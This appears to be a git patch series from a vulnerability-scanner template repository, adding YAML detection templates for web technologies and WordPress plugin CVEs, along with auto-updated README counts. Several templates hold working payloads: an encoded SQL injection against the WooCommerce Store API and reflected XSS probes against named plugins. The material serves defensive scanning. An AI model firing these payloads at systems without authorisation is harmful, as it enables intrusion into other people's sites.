/wp-json/wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522nuclei-pdteam%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1 - {{Hostname}} + - method: GET + path: + - '{{BaseURL}}/wp-json/wc/store/products/collection-data?calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' + - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500' matchers-condition: and matchers: - type: word words: - - 'nuclei-pdteam' - - '"count":' - part: body + - 'sqli-test' + - 'attribute_counts' condition: and - type: word @@ -32,4 +30,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 81e94056c76ac14113fa61353b75193cf054b6c2 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:34:17 +0700 Subject: [PATCH 0689/4083] Create yapi-detect.yaml --- technologies/yapi-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/yapi-detect.yaml diff --git a/technologies/yapi-detect.yaml b/technologies/yapi-detect.yaml new file mode 100644 index 0000000000..fb38ed2157 --- /dev/null +++ b/technologies/yapi-detect.yaml @@ -0,0 +1,25 @@ +id: yapi-detect + +info: + name: YApi Detect + author: pikpikcu + severity: info + tags: tech,yapi + +requests: + - method: GET + path: + - "{{BaseURL}}/" + - "{{BaseURL}}:3000" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + + - type: status + status: + - 200 From 965bc15a89c73cc2a88629e98130895e448f8304 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 16 Jul 2021 08:48:26 +0700 Subject: [PATCH 0690/4083] Create node-red-detect.yaml --- technologies/node-red-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/node-red-detect.yaml diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml new file mode 100644 index 0000000000..9db6df3b6f --- /dev/null +++ b/technologies/node-red-detect.yaml @@ -0,0 +1,24 @@ +id: node-red-detect + +info: + name: Node RED Detect + author: pikpikcu + severity: info + tags: tech,node-red,apache + +requests: + - method: GET + path: + - "{{BaseURL}}/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Node-RED" + + - type: status + status: + - 200 From e89607941cbea26887b6cd288200508e16133dc8 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:20:28 +0700 Subject: [PATCH 0691/4083] Create CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-18536.yaml diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml new file mode 100644 index 0000000000..ea6350dac0 --- /dev/null +++ b/cves/2017/CVE-2017-18536.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-18536 + +info: + name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/?author=1%3Cimg%20src%3Dx%20onerror%3Djavascript%3Aprompt%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From d07faf803419f8a65ebddd453279afbc30494766 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:22:53 +0700 Subject: [PATCH 0692/4083] Create CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17451.yaml diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml new file mode 100644 index 0000000000..a42dbf3e4b --- /dev/null +++ b/cves/2017/CVE-2017-17451.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17451 + +info: + name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/wp-mailster/view/subscription/unsubscribe2.php?mes=%3C%2Fscript%3E%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 2a76b19a36179aafaa3fd8011a424b4a0808f020 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:25:24 +0700 Subject: [PATCH 0693/4083] Create CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2017/CVE-2017-17059.yaml diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml new file mode 100644 index 0000000000..7fccdaa7b6 --- /dev/null +++ b/cves/2017/CVE-2017-17059.yaml @@ -0,0 +1,31 @@ +id: CVE-2017-17059 + +info: + name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: POST + path: + - "{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E=1" + + body: "amty_hidden=1" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 5be858f2d633a5793d8dc86f3b1debaf300ebc63 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:27:01 +0700 Subject: [PATCH 0694/4083] Create CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-17043.yaml diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml new file mode 100644 index 0000000000..7fd40c1e11 --- /dev/null +++ b/cves/2017/CVE-2017-17043.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-17043 + +info: + name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%22%2F%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 03698a57eea5d519df3b045bbd7cbb8e05dd83dc Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 11:28:40 +0700 Subject: [PATCH 0695/4083] Create CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2017/CVE-2017-9288.yaml diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml new file mode 100644 index 0000000000..1b442b3bf6 --- /dev/null +++ b/cves/2017/CVE-2017-9288.yaml @@ -0,0 +1,29 @@ +id: CVE-2017-9288 + +info: + name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 + tags: cve,cve2017,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 From 4dfcea3bea7c968c7d81d2f40291b0a2f4ff0302 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:28:02 +0530 Subject: [PATCH 0696/4083] Update node-red-detect.yaml --- technologies/node-red-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/node-red-detect.yaml b/technologies/node-red-detect.yaml index 9db6df3b6f..721bac1466 100644 --- a/technologies/node-red-detect.yaml +++ b/technologies/node-red-detect.yaml @@ -4,7 +4,7 @@ info: name: Node RED Detect author: pikpikcu severity: info - tags: tech,node-red,apache + tags: tech,apache requests: - method: GET From 6dfd64ecc9987848cc7ed411b35ddacb67e5a490 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 04:59:58 +0000 Subject: [PATCH 0697/4083] Auto Update README [Fri Jul 16 04:59:58 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b2ebc20708..835bd4293d 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 120 | +| takeovers | 70 | exposures | 116 | technologies | 121 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1551 files**. +**128 directories, 1552 files**. From 4287359c29e89a405d5a1ef4ced19b5b0d2edbc8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:30:43 +0530 Subject: [PATCH 0698/4083] Update CVE-2017-9288.yaml --- cves/2017/CVE-2017-9288.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-9288.yaml b/cves/2017/CVE-2017-9288.yaml index 1b442b3bf6..19bdc03839 100644 --- a/cves/2017/CVE-2017-9288.yaml +++ b/cves/2017/CVE-2017-9288.yaml @@ -4,6 +4,7 @@ info: name: Raygun4WP <= 1.8.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Raygun4WP plugin 1.8.0 for WordPress is vulnerable to a reflected XSS in sendtesterror.php (backurl parameter). reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9288 tags: cve,cve2017,wordpress,xss,wp-plugin From bf583274fd7c429a0117b7b7617218e610697eff Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:05:07 +0000 Subject: [PATCH 0699/4083] Auto Update README [Fri Jul 16 05:05:07 UTC 2021] :robot: --- README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/README.md b/README.md index 835bd4293d..af2ddb7b77 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 430 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 121 | +| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| takeovers | 70 | exposures | 116 | technologies | 122 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1552 files**. +**128 directories, 1554 files**. From e859860aaa3e60bd2e6a5bc6173017efbeae6020 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:08:39 +0000 Subject: [PATCH 0700/4083] Auto Update README [Fri Jul 16 05:08:39 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index af2ddb7b77..437101d33b 100644 --- a/README.md +++ b/README.md @@ -39,12 +39,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | | cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | -| takeovers | 70 | exposures | 116 | technologies | 122 | +| takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1554 files**. +**128 directories, 1555 files**. From a7f24729222e69467d3b205505b96db8d074a87e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:41:33 +0530 Subject: [PATCH 0701/4083] Update CVE-2017-18536.yaml --- cves/2017/CVE-2017-18536.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-18536.yaml b/cves/2017/CVE-2017-18536.yaml index ea6350dac0..5ac65f849b 100644 --- a/cves/2017/CVE-2017-18536.yaml +++ b/cves/2017/CVE-2017-18536.yaml @@ -4,6 +4,7 @@ info: name: Stop User Enumeration 1.3.5-1.3.7 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Stop User Enumeration WordPress plugin was affected by an Unauthenticated Reflected Cross-Site Scripting (XSS) security vulnerability. reference: https://wpscan.com/vulnerability/956cc5fd-af06-43ac-aa85-46b468c73501 tags: cve,cve2017,wordpress,xss,wp-plugin From f0d1da0d2e15c512a505533438785ff7a2aa482e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:43:04 +0530 Subject: [PATCH 0702/4083] Update CVE-2017-17451.yaml --- cves/2017/CVE-2017-17451.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17451.yaml b/cves/2017/CVE-2017-17451.yaml index a42dbf3e4b..40a4e59745 100644 --- a/cves/2017/CVE-2017-17451.yaml +++ b/cves/2017/CVE-2017-17451.yaml @@ -4,6 +4,7 @@ info: name: WP Mailster <= 1.5.4 - Unauthenticated Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The WP Mailster plugin before 1.5.5 for WordPress has XSS in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17451 tags: cve,cve2017,wordpress,xss,wp-plugin From a5efbf1289a9d7928b998552f2ca161014c5f0a2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:13:22 +0000 Subject: [PATCH 0703/4083] Auto Update README [Fri Jul 16 05:13:22 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 437101d33b..ff56b294ff 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 431 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1555 files**. +**128 directories, 1556 files**. From be7247bc77c743ce064323a3e5cfad1b3d10898f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:44:57 +0530 Subject: [PATCH 0704/4083] Update CVE-2017-17059.yaml --- cves/2017/CVE-2017-17059.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2017/CVE-2017-17059.yaml b/cves/2017/CVE-2017-17059.yaml index 7fccdaa7b6..ecf71fafc7 100644 --- a/cves/2017/CVE-2017-17059.yaml +++ b/cves/2017/CVE-2017-17059.yaml @@ -4,7 +4,10 @@ info: name: amtyThumb posts 8.1.3 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + description: XSS exists in the amtyThumb amty-thumb-recent-post (aka amtyThumb posts or wp-thumb-post) plugin 8.1.3 for WordPress via the query string to amtyThumbPostsAdminPg.php. + reference: | + - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 + - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 tags: cve,cve2017,wordpress,xss,wp-plugin requests: From 71e397625c682e82c103df281566d5c116565532 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:19:51 +0000 Subject: [PATCH 0705/4083] Auto Update README [Fri Jul 16 05:19:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ff56b294ff..71de9e5dcd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 432 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1556 files**. +**128 directories, 1558 files**. From a047cd77ffc21f2f9c5d61bb05851681461cdbe6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:50:55 +0530 Subject: [PATCH 0706/4083] Update CVE-2017-17043.yaml --- cves/2017/CVE-2017-17043.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2017/CVE-2017-17043.yaml b/cves/2017/CVE-2017-17043.yaml index 7fd40c1e11..3d321b4c8f 100644 --- a/cves/2017/CVE-2017-17043.yaml +++ b/cves/2017/CVE-2017-17043.yaml @@ -4,6 +4,7 @@ info: name: Emag Marketplace Connector 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The Emag Marketplace Connector plugin 1.0.0 for WordPress has reflected XSS because the parameter "post" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly. reference: https://nvd.nist.gov/vuln/detail/CVE-2017-17043 tags: cve,cve2017,wordpress,xss,wp-plugin From a78e6caafcff2a11bbcefd2970238a92458791a7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 10:57:50 +0530 Subject: [PATCH 0707/4083] Update CVE-2019-16332.yaml --- cves/2019/CVE-2019-16332.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-16332.yaml b/cves/2019/CVE-2019-16332.yaml index fa833c4377..f067dd1e34 100644 --- a/cves/2019/CVE-2019-16332.yaml +++ b/cves/2019/CVE-2019-16332.yaml @@ -4,6 +4,7 @@ info: name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS. reference: https://nvd.nist.gov/vuln/detail/CVE-2019-16332 tags: cve,cve2019,wordpress,xss,wp-plugin From a08eed7ce80312cf2d119dfa75b493b1c1259f1f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:00:01 +0530 Subject: [PATCH 0708/4083] Update CVE-2019-15713.yaml --- cves/2019/CVE-2019-15713.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2019/CVE-2019-15713.yaml b/cves/2019/CVE-2019-15713.yaml index 405bd13a64..55c9e48f5d 100644 --- a/cves/2019/CVE-2019-15713.yaml +++ b/cves/2019/CVE-2019-15713.yaml @@ -4,7 +4,10 @@ info: name: My Calendar <= 3.1.9 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2019-15713 + description: Triggered via unescaped usage of URL parameters in multiple locations presented in the public view of a site. + reference: | + - https://wpscan.com/vulnerability/9267 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15713 tags: cve,cve2019,wordpress,xss,wp-plugin requests: From b7357ba87137e6442972254311396e32a58da0b6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:30:52 +0000 Subject: [PATCH 0709/4083] Auto Update README [Fri Jul 16 05:30:52 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 71de9e5dcd..7509741656 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 434 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1558 files**. +**128 directories, 1559 files**. From da4b0d4da78c5db9335f856fc84de711a03f0412 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:01:29 +0530 Subject: [PATCH 0710/4083] Update CVE-2018-20462.yaml --- cves/2018/CVE-2018-20462.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-20462.yaml b/cves/2018/CVE-2018-20462.yaml index e136ee5786..79a0cbd39f 100644 --- a/cves/2018/CVE-2018-20462.yaml +++ b/cves/2018/CVE-2018-20462.yaml @@ -4,6 +4,7 @@ info: name: JSmol2WP <= 1.07 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: An issue was discovered in the JSmol2WP plugin 1.07 for WordPress. A cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-20462 tags: cve,cve2018,wordpress,xss,wp-plugin From a1ccf71bede31e207381362b1b008f1b24bc9ac6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:33:01 +0000 Subject: [PATCH 0711/4083] Auto Update README [Fri Jul 16 05:33:01 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7509741656..13cd0e31bd 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 435 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1559 files**. +**128 directories, 1561 files**. From f977df559c27e75c3d4da4b08abe23b38aafbd42 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:05:11 +0530 Subject: [PATCH 0712/4083] Update CVE-2018-11709.yaml --- cves/2018/CVE-2018-11709.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2018/CVE-2018-11709.yaml b/cves/2018/CVE-2018-11709.yaml index e78227f474..4f305a6330 100644 --- a/cves/2018/CVE-2018-11709.yaml +++ b/cves/2018/CVE-2018-11709.yaml @@ -4,6 +4,7 @@ info: name: wpForo Forum <= 1.4.11 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: wpforo_get_request_uri in wpf-includes/functions.php in the wpForo Forum plugin before 1.4.12 for WordPress allows Unauthenticated Reflected Cross-Site Scripting (XSS) via the URI. reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11709 tags: cve,cve2018,wordpress,xss,wp-plugin From 222ff1b14336d66e0791d412ae26b642c931a4fe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 16 Jul 2021 05:38:12 +0000 Subject: [PATCH 0713/4083] Auto Update README [Fri Jul 16 05:38:12 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 13cd0e31bd..7663833b39 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 437 | vulnerabilities | 233 | exposed-panels | 200 | +| cves | 440 | vulnerabilities | 233 | exposed-panels | 200 | | takeovers | 70 | exposures | 116 | technologies | 123 | | misconfiguration | 77 | workflows | 33 | miscellaneous | 27 | | default-logins | 37 | file | 42 | dns | 10 | | fuzzing | 10 | helpers | 9 | iot | 18 | -**128 directories, 1561 files**. +**128 directories, 1564 files**. From 0c4a223fa0a19d54ed25bf9a758f39976db198f5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 16 Jul 2021 11:13:17 +0530 Subject: [PATCH 0714/4083] Update CVE-2016-10960.yaml --- cves/2016/CVE-2016-10960.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-10960.yaml b/cves/2016/CVE-2016-10960.yaml index 3110e9b2eb..2894158ab8 100644 --- a/cves/2016/CVE-2016-10960.yaml +++ b/cves/2016/CVE-2016-10960.yaml @@ -5,7 +5,10 @@ info: author: daffainfo severity: critical description: The wsecure plugin before 2.4 for WordPress has remote code execution via shell metacharacters in the wsecure-config.php publish parameter. - reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 + reference: | + - https://www.pluginvulnerabilities.com/2016/07/12/remote-code-execution-rce-vulnerability-in-wsecure-lite/ + - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-wsecure-lite-remote-code-execution-2-3/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10960 tags: cve,cve2016,wordpress,wp-plugin,rce requests: From 6aef9702587db6fb0cb5cda23e419adae82fc206 Mon Sep 17 00:00:00 2001 From: Regala Date: Fri, 16 Jul 2021 12:19:30 +0100 Subject: [PATCH 0715/4083] Update CVE-2020-17362.yaml Added "nova-lite" matcher; massively reduce false positives. --- cves/2020/CVE-2020-17362.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2020/CVE-2020-17362.yaml b/cves/2020/CVE-2020-17362.yaml index 2e265da33c..0fdc277777 100644 --- a/cves/2020/CVE-2020-17362.yaml +++ b/cves/2020/CVE-2020-17362.yaml @@ -20,6 +20,11 @@ requests: - "" part: body + - type: word + words: + - "nova-lite" + part: body + - type: word part: header words: From 90776cea1c4b9154f0428c009b7400b8ca2efd53 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 16 Jul 2021 18:52:12 +0700 Subject: [PATCH 0716/4083] Create CVE-2020-14461.yaml --- cves/2020/CVE-2020-14461.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 cves/2020/CVE-2020-14461.yaml diff --git a/cves/2020/CVE-2020-14461.yaml b/cves/2020/CVE-2020-14461.yaml new file mode 100644 index 0000000000..748517d9db --- /dev/null +++ b/cves/2020/CVE-2020-14461.yaml @@ -0,0 +1,26 @@ +id: CVE-2020-14461 + +info: + name: Eaton Intelligent Power Manager 1.6 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion + - https://nvd.nist.gov/vuln/detail/CVE-2020-14461 + - https://www.exploit-db.com/exploits/48614 + tags: cve,cve2020,lfi + +requests: + - method: GET + path: + - 